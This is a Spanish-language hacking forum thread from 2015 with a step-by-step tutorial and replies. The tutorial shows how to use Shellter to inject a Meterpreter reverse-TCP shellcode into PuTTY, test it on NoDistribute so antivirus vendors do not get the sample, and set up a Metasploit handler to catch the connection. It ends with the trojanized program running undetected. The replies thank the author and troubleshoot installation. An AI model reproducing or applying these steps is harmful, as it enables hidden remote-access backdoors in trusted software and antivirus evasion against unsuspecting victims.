Evadiendo Antivirus con Shellter

Iniciado por LionSec, Julio 13, 2015, 04:32:00 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Julio 13, 2015, 04:32:00 PM Ultima modificación: Agosto 07, 2015, 09:43:18 PM por Gabriela
Shellter es una herramienta dinámica de inyección de shellcode . Puede ser ustilizado para inyectar código shell en las aplicaciones nativas de Windows (Sólo 32 bits por el momento).
Puedes inyectar tu propio código o uno generado con un Framework, como Metasploit por ejemplo.
Shellter aprovecha la estructura original del archivo PE y no aplica ninguna modificación .

Para más información visita : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

Instalación

Lo primero que haremos es descargarlo desde su página oficial (You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login) . Es compatible con Windows , Linux y Mac (Usando wine) .
Instalación en kali linux (Si aún no tienes instalado Wine)

Código: bash
apt-get update
apt-get install shellter

Instalación en backbox

Primero hay que agregar los repositorios :

Código: bash
nano /etc/apt/sources.list


Añadimos las siguientes entradas :

Código: text
deb http://ppa.launchpad.net/backbox/four/ubuntu trusty main
deb-src http://ppa.launchpad.net/backbox/four/ubuntu trusty main


Código: bash
apt-get update
apt-get install shellter


Instalación en Arch Linux :

Código: bash
yaourt -Syy
yaourt -S aur/shellter



En mi caso , estoy usando LionSec Linux (Basado en backbox) .

Una vez instalado , la siguente fase sería la ejecución .

Para ejecutarlo tecleamos "shellter" en la terminal , o "wine shellter.exe" para los que ya tenien instalado Wine .
Una vez ejecutado , elegimos la opción "Automatique"  (A) .



Después indicamos la ruta del archivo al que queremos inyectar el shellcode . Yo utilisaré putty .



Ahora tenemos que indicar si queremos configurar un payload o elgir uno de la lista que nos propone Shellter. Podemos elegir la opción "L" (Listed) si queremos utilizar uno que ya aparece en la lista , "C" (Configure) para configurarlo manualmente .

Vamos a teclear (L)



Después seleccionamos el payload que vamos a utilizar . Yo elegiré el primero (Meterpreter_Reverse_TCP) .

A continuación indicamos nuestra dirección IP y el puerto de escucha .



Y ya habremos terminado con Shellter .

Bueno ahora vamos a escanear nuestro archivo , en NoDistribute por ejemplo(Recomendado) .
Resultado




:) :)

OK , sólo nos queda configurar el "listener" .

Código: text
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost x.x.x.x
set lport xxx
exploit




En mi máquina de prueba , dotada de 1 un antivirus , voy a ejecutar mi archivo (putty) . Y como me lo esperaba , no salta ninguna alerta y se ejecuta sin problema .



Demo


Bueno amigos , eso ha sido todo . Espero que le sirva a más de uno .

Fuente : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Saludos
Julio 13, 2015, 10:10:41 PM #1
excelente aporte @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login probaré que tal funciona y preguntaré por dudas que presente en el momento, aunque no debería tenerlas si está explicado paso a paso :)

Saludos!
VECTOR
Julio 14, 2015, 03:28:16 AM #2
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
excelente aporte @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login probaré que tal funciona y preguntaré por dudas que presente en el momento, aunque no debería tenerlas si está explicado paso a paso :)

Saludos!
VECTOR
Gracias @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login , espero que te sirva
Julio 29, 2015, 07:53:46 PM #3
Hola buenas tardes, primero que todo muy buen aporte; muchas gracias.
Tengo un problema:
- Cuando llego a la parte de seleccionar los payloads no se muestra ninguno, queda en Select payload... Pero no se muestra ningun payload a seleccionar.
Me podrian ayudar por fa?

Gracias
Agosto 30, 2015, 12:31:00 PM #4
Hola @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, mmm que OS usas??, yo usé Kali v1 y funcionó perfecto, eso si que tube que instalar el Wine, y eso que no se muestren los payloads... prueba iniciando la DB con #service postgresql start y prueba el shellter.

documentacion de kali: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
espero por ayudarte.

Saludos.
Vector  ;D
Octubre 17, 2015, 08:46:39 PM #5
Funciona con Kali 2.0 en 64 bits? Porque yo no lo puedo hacer andar  :-\
Me da error Wine al querer correr shellter.exe
Octubre 19, 2015, 01:29:06 PM #6
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Funciona con Kali 2.0 en 64 bits? Porque yo no lo puedo hacer andar  :-\
Me da error Wine al querer correr shellter.exe

Se mas especifico para poder ayudarte, que tipo de error te da.
Imprimir
Ir Arriba Páginas1
Acciones del Usuario